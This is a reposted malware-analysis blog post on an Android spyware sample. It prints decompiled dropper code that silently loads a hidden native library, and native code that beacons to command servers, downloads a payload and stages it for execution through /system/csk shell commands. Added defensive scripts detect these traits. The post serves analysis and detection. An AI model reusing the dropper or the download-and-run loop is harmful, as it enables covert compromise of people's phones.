android malware
Source: Internet  Published by: 苏州app软件开发  Editor: 程序博客网  Time: 2024/05/23 01:23
Source: https://github.com/fs0c131y/Android-Malwares/tree/c897dff1796c9cb7f19104e9ce3546d54cd55a45/Chrysaor/
Sample hash (SHA-256): 3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86
Opened in JEB, the APK has the following structure.
Looking at the manifest first, the app requests a very large number of permissions; the entry point is here.
Decompiling it gives the following Java code:
```java
package com.network.android;

import android.app.Activity;
import android.os.Bundle;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

public class NetworkMain extends Activity {
    public NetworkMain() {
        super();
    }

    protected void onCreate(Bundle arg8) {
        super.onCreate(arg8);
        // Destination inside the app's own private data directory
        String v2 = "/data/data/com.network.android/libsgn.so";
        try {
            // Read the whole native library out of assets/ ...
            InputStream v1 = this.getResources().getAssets().open("libsgn.so");
            byte[] v0 = new byte[v1.available()];
            v1.read(v0);
            ByteArrayOutputStream v3 = new ByteArrayOutputStream();
            v3.write(v0);
            v3.close();
            v1.close();
            // ... write it to disk ...
            FileOutputStream v4 = new FileOutputStream(v2);
            v3.writeTo(((OutputStream)v4));
            ((OutputStream)v4).close();
            // ... and load it by absolute path, which runs its JNI_OnLoad
            System.load(v2);
        } catch(IOException v5_2) {
            // JEB listed the handlers as Throwable, Exception, IOException;
            // they are reordered most-specific first here so the source compiles.
            // Every error is silently swallowed.
        } catch(Exception v5_1) {
        } catch(Throwable v5) {
        }
        // No UI is ever shown: the activity finishes immediately
        this.finish();
    }
}
```
There is no user interface at all. The activity writes the .so from the assets directory straight to /data/data/com.network.android/libsgn.so, loads it with System.load(), and then calls finish(). From here on the work moves to IDA.
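The dropper pattern above (an ELF shipped under assets/ rather than lib/&lt;abi&gt;/, copied out at runtime and loaded with System.load()) is easy to triage statically. The following script is an added example, not code from the original post or from the sample: it walks an APK as a zip, flags every entry outside lib/ that starts with ELF magic, and reports its class, machine type and SHA-256. The APK it scans is constructed in memory with a synthetic ELF header; the entry names are the ones the post mentions plus invented filler.

```python
"""Find native code hidden outside lib/<abi>/ in an APK (added example, constructed input)."""
import hashlib
import io
import struct
import zipfile

ELF_MAGIC = b"\x7fELF"
# e_machine values from the ELF spec; anything else is reported as hex
MACHINES = {0x03: "x86", 0x28: "ARM", 0x3E: "x86-64", 0xB7: "AArch64"}


def describe_elf(data: bytes):
    """Return (elf_class, machine) parsed from an ELF header, or None if not ELF."""
    if len(data) < 20 or not data.startswith(ELF_MAGIC):
        return None
    elf_class = {1: "ELF32", 2: "ELF64"}.get(data[4], "ELF?")
    endian = "<" if data[5] == 1 else ">"          # EI_DATA: 1 = LSB, 2 = MSB
    (e_machine,) = struct.unpack_from(endian + "H", data, 18)
    return elf_class, MACHINES.get(e_machine, hex(e_machine))


def find_hidden_natives(apk_bytes: bytes):
    """ELF payloads stored outside lib/<abi>/ (assets/, res/raw/, ...), with hashes.

    A library the app loads normally lives under lib/<abi>/ and is loaded by
    System.loadLibrary(); an ELF under assets/ that the app copies out and
    System.load()s is the dropper pattern seen in NetworkMain above.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for info in z.infolist():
            if info.is_dir() or info.filename.startswith("lib/"):
                continue
            data = z.read(info.filename)
            desc = describe_elf(data)
            if desc is None:
                continue
            hits.append({
                "name": info.filename,
                "sha256": hashlib.sha256(data).hexdigest(),
                "class": desc[0],
                "machine": desc[1],
            })
    return hits


def _fake_elf(elf_class=1, e_machine=0x28):
    """Constructed little-endian ELF header, just enough for describe_elf() to parse."""
    e_ident = ELF_MAGIC + bytes([elf_class, 1, 1, 0]) + b"\x00" * 8   # 16 bytes
    e_type_machine = struct.pack("<HH", 3, e_machine)                 # ET_DYN, e_machine
    return e_ident + e_type_machine + b"\x00" * 32


def build_sample_apk():
    """Constructed APK-like zip: an ELF hidden in assets/, a normal lib/, a data asset."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00")   # placeholder, not real AXML
        z.writestr("assets/libsgn.so", _fake_elf())
        z.writestr("assets/config.bin", b"not an ELF")
        z.writestr("lib/armeabi/libnormal.so", _fake_elf())
    return buf.getvalue()


if __name__ == "__main__":
    # On a real sample: find_hidden_natives(open("sample.apk", "rb").read())
    for hit in find_hidden_natives(build_sample_apk()):
        print(hit)
```

Only the assets/ entry is reported; lib/armeabi/libnormal.so is skipped because that is where a native library is expected. On a real APK, the SHA-256 of the extracted ELF is what you would compare against a sample hash such as the one listed at the top of this post.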
I can't really analyze the native code, so all I can do is look at a pile of strings.
Oh, right, JNI_OnLoad() is worth a look: it calls fork(), and then main()!
The code of main() is impressive, but it uses a lot of functions I don't understand:
```c
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  void *v3; // r0@1
  int v4; // r5@2
  int v5; // r7@6
  void *v6; // r5@7
  char *v7; // r0@12
  const char *v8; // r2@12
  const char *v9; // r3@12
  char *v10; // [sp+0h] [bp-4A0h]@0
  char *v11; // [sp+4h] [bp-49Ch]@0
  int v12; // [sp+Ch] [bp-494h]@7
  char *v13; // [sp+10h] [bp-490h]@7
  int v14; // [sp+1Ch] [bp-484h]@1
  int v15; // [sp+20h] [bp-480h]@1
  void *ptr; // [sp+24h] [bp-47Ch]@1
  int v17; // [sp+28h] [bp-478h]@7
  char v18; // [sp+2Ch] [bp-474h]@1
  char v19; // [sp+3Ch] [bp-464h]@1
  char v20; // [sp+60h] [bp-440h]@1
  char s; // [sp+84h] [bp-41Ch]@1
  int v22; // [sp+484h] [bp-1Ch]@1

  v14 = 0;
  v15 = 0;
  v22 = _stack_chk_guard;
  ptr = 0;
  memset(&s, 0, 0x400u);     // path buffer for the dropped payload
  memset(&v19, 0, 0x21u);    // 32 hex chars + NUL
  memset(&v18, 0, 0xDu);     // 12 chars + NUL (MAC address)
  v3 = memset(&v20, 0, 0x21u);
  handle_signals(v3);
  g_sleep_time_in_seconds = 30;
  sleep(0x1Eu);              // 30 s delay before the first beacon
  geteuid();
  while ( 1 )
  {
    v4 = 0;
    if ( socket_connect(&v14, SERVERS, unk_600C) == 1 )
    {
      get_random_hexlified_md5(&v19);        // random 32-hex token
      get_mac_address(&v18);
      get_hexlified_md5(&v18, &v20, 12);     // hexlified MD5 of the MAC
      if ( http_send_request_with_get(&v20, &v19, SERVERS, v14) == 1
        && http_receive_payload(v14, &ptr, &v15) == 1 )
      {
        socket_disconnect(&v14);
        if ( socket_connect(&v14, SERVERS, unk_600C) == 1 )
        {
          v5 = v15;
          v4 = 1;
          if ( v15 > 0 )
          {
            v12 = v14;
            v6 = ptr;
            v13 = SERVERS;
            v17 = 0;
            if ( file_exists("/system/csk", &v17) != 1 )
              goto LABEL_17;
            if ( v17 )
            {
              // /system/csk present: stage the payload through it into /mnt/obb
              if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1
                || system("/system/csk \"cat /data/data/com.network.android/.coldboot_init > /mnt/obb/.coldboot_init\"") == -1
                || system("/system/csk \"chmod 711 /mnt/obb/.coldboot_init\"") == -1 )
              {
LABEL_17:
                v4 = 0;
                goto LABEL_18;
              }
              unlink("/data/data/com.network.android/.coldboot_init");
              v7 = &s;
              v8 = "%s";
              v9 = "/mnt/obb/.coldboot_init";
            }
            else
            {
              // no /system/csk: keep the payload in the app's data directory
              if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1 )
                goto LABEL_17;
              v7 = &s;
              v8 = "%s";
              v9 = "/data/data/com.network.android/.coldboot_init";
            }
            // v10/v11 are decompiler artifacts (extra register arguments); "%s" consumes only v9
            if ( snprintf(v7, 0x3FFu, v8, v9, v10, v11) <= 0 )
              goto LABEL_17;
            v10 = &v19;
            v11 = v13;
            v4 = sub_1CF4(v12, &s, v17, &v20);
            if ( v4 != 1 )
              goto LABEL_17;
          }
        }
      }
    }
LABEL_18:
    if ( ptr )
    {
      free(ptr);
      ptr = 0;
    }
    socket_disconnect(&v14);
    if ( v4 == 1 )
      pthread_exit(0);                    // done: leave the loop for good
    sleep(g_sleep_time_in_seconds);       // otherwise back off and retry
  }
}
```
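Read top to bottom, main() sleeps 30 s, then loops: connect to one of SERVERS, build a random hexlified MD5 plus the hexlified MD5 of the MAC address, send an HTTP GET, and receive a payload. If /system/csk exists, the payload is written to /data/data/com.network.android/.coldboot_init, copied through /system/csk to /mnt/obb/.coldboot_init, chmod 711'd there, and the staging copy is unlinked; without /system/csk it stays in the app data directory. Either way the path is handed to sub_1CF4, and on success the thread exits. The file paths and the /system/csk invocations are stable, host-observable behaviour, so they make a good behavioural signature. The detector below is an added example, not from the original post: it replays a strace -f style trace (the trace text, the pid values and the line format are constructed for the demo) and raises an alert per pid only when the drop step is followed by either the csk staging steps or an in-place execution of the staging file.

```python
"""Behavioural detector for the .coldboot_init staging chain (added example, constructed input)."""
import re
from collections import defaultdict

STAGING = "/data/data/com.network.android/.coldboot_init"
FINAL = "/mnt/obb/.coldboot_init"
CSK = "/system/csk"

# "<pid> <syscall>(<args>) = <ret> ..." as strace -f prints it (assumed format)
LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<call>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>-?\d+)")

# Constructed trace for the demo: pid 4211 plays the /system/csk branch of main(),
# pid 4300 is an unrelated app doing ordinary file I/O.
SAMPLE_TRACE = r'''
4211 stat64("/system/csk", {...}) = 0
4211 openat(AT_FDCWD, "/data/data/com.network.android/.coldboot_init", O_WRONLY|O_CREAT|O_TRUNC, 0700) = 5
4211 chmod("/data/data/com.network.android/.coldboot_init", 0711) = 0
4300 openat(AT_FDCWD, "/data/data/com.example.notes/files/draft.txt", O_WRONLY|O_CREAT, 0600) = 7
4211 execve("/system/bin/sh", ["sh", "-c", "/system/csk \"cat /data/data/com.network.android/.coldboot_init > /mnt/obb/.coldboot_init\""], 0xbe8) = 0
4211 execve("/system/bin/sh", ["sh", "-c", "/system/csk \"chmod 711 /mnt/obb/.coldboot_init\""], 0xbe8) = 0
4300 execve("/system/bin/ls", ["ls", "/mnt/obb"], 0xbe8) = 0
4211 unlink("/data/data/com.network.android/.coldboot_init") = 0
'''


def _stage(call, args):
    """Map one successful syscall to a stage of the chain, or None if unrelated."""
    if call in ("open", "openat", "creat") and STAGING in args and (call == "creat" or "O_CREAT" in args):
        return "drop_staging"                      # write_buffer_as_executable(...)
    if call == "execve":
        if CSK in args and FINAL in args and "cat " in args:
            return "copy_via_csk"                  # system("/system/csk \"cat ... > /mnt/obb/...\"")
        if CSK in args and FINAL in args and "chmod" in args:
            return "chmod_via_csk"                 # system("/system/csk \"chmod 711 ...\"")
        if args.startswith('"' + STAGING + '"'):
            return "run_staging"                   # no-csk branch: payload executed in place
    if call == "unlink" and STAGING in args:
        return "cleanup_staging"                   # unlink(...) after the copy
    return None


def stages_by_pid(trace):
    """Ordered, de-duplicated list of chain stages observed per pid (failed calls ignored)."""
    seen = defaultdict(list)
    for line in trace.splitlines():
        m = LINE_RE.match(line)
        if not m or int(m["ret"]) < 0:
            continue
        stage = _stage(m["call"], m["args"])
        if stage and stage not in seen[m["pid"]]:
            seen[m["pid"]].append(stage)
    return dict(seen)


def verdict(stages):
    """Alert only when the payload was dropped AND then staged via csk or run in place."""
    if "drop_staging" not in stages:
        return None
    if {"copy_via_csk", "chmod_via_csk"} <= set(stages):
        return "coldboot_init staged to /mnt/obb via /system/csk"
    if "run_staging" in stages:
        return "coldboot_init executed from app data dir (no /system/csk)"
    return None


def alerts(trace):
    """pid -> alert message for every pid whose observed stages satisfy verdict()."""
    out = {}
    for pid, stages in stages_by_pid(trace).items():
        msg = verdict(stages)
        if msg:
            out[pid] = msg
    return out


if __name__ == "__main__":
    for pid, msg in alerts(SAMPLE_TRACE).items():
        print(pid, msg)
```

Requiring the drop step before the csk or execute step keeps a lone `cat` or `chmod` of /mnt/obb from firing; the path strings themselves (and /system/csk, a binary outside /system/bin that the sample expects to run shell commands for it) are also worth adding as plain string IOCs for a YARA or strings-based sweep of extracted libraries.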